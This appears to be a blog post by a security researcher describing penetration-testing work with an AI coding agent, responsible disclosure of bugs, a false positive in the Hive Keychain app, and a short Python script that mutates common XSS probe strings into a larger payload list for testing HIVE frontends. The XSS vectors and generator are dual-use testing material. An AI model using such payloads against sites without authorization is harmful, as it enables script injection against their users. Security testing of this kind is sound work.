I’ve had the full version of Claude Max Coding AI running since this morning, and of course I’ve already started working on various projects. After setting up my work environment (a virtual machine with Kali Linux for penetration testing), I examined a few publicly available repositories. In some of them I was able to dig deeper and find relatively serious bugs in the code. After reviewing the findings and judging them worth reporting, I packaged them into a report.
And naturally, I shared the audits with the affected projects. I’m already noticing that it’s kind of addictive: it’s fast, efficient, and meticulous. But beyond the simple “do this, do that,” you still have to invest a lot of your own time double-checking the results, and that verification is where most of the time goes. For example, I spent about five hours trying to reproduce a bug that Claude reported in the Hive Keychain mobile app, which meant experimenting with my phone, a USB cable, and the Android SDK.
The PoC (proof-of-concept) code looked very promising at first, but it turned out there was no actual bug there. Still, I prefer having something I can test myself, so I tried it right away; I’d rather spend time chasing a potential bug than have it go unnoticed and cause more serious damage later.
Since I’ve had to deal with HIVE frontends time and again in the past, I asked Claude to write me a few more creative payloads for XSS attacks and vulnerability testing. The result is around 440 unique XSS approaches that can be tested against HIVE’s various frontends. Developers will know what to do with them.
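Claude’s actual payload list isn’t reproduced here, but the general idea of expanding a handful of base vectors into many unique test strings can be sketched in a few lines of Python. The base vectors and mutation rules below are my own illustrative choices (common, publicly known XSS probes), not Claude’s output, and a real list would use far more of both:

```python
import urllib.parse

# A few common, publicly known XSS probe strings (illustrative only).
BASE_VECTORS = [
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
    '"><svg onload=alert(1)>',
    "javascript:alert(1)",
]

def mutations(vector):
    """Yield encoding/casing variants of one base vector."""
    yield vector
    yield vector.upper()                                   # trips naive case-sensitive filters
    yield urllib.parse.quote(vector)                       # URL-encoded, for query parameters
    yield urllib.parse.quote(urllib.parse.quote(vector))   # double-encoded
    yield vector.replace("alert(1)", "alert`1`")           # dodges parenthesis filtering

def build_payload_list(vectors):
    """Combine every vector with every mutation, deduplicating but keeping order."""
    seen, out = set(), []
    for v in vectors:
        for m in mutations(v):
            if m not in seen:
                seen.add(m)
                out.append(m)
    return out

payloads = build_payload_list(BASE_VECTORS)
print(len(payloads))
```

Scaling the same combinatorial approach to more vectors, encodings, and injection contexts is how a list of several hundred unique payloads comes together quickly.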
I'm curious to see what comes out of using the Claude AI agent over the next few days. It's going to be exciting!